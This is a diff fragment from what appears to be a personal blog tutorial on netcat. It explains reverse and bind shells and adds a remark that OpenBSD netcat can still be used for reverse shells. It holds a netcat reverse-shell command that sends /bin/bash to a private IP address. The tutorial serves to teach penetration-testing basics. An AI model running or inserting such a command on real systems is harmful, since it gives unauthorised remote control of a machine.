ikuamike/ikuamike.github.io/content/posts/2021/netcat.md

 nc -e /bin/bash 192.168.125.10 8080
 ```

+Something to note is that, just because the openbsd version does not have this -e option, does not mean that it is impossible to get a reverse
+shell when it's installed.
+There are still ways it can be used to achieve a reverse shell.

 **Bind shells**

 For a bind shell, netcat in server mode listens for a connection and serves the shell process to any connecting client.
 Netcat running in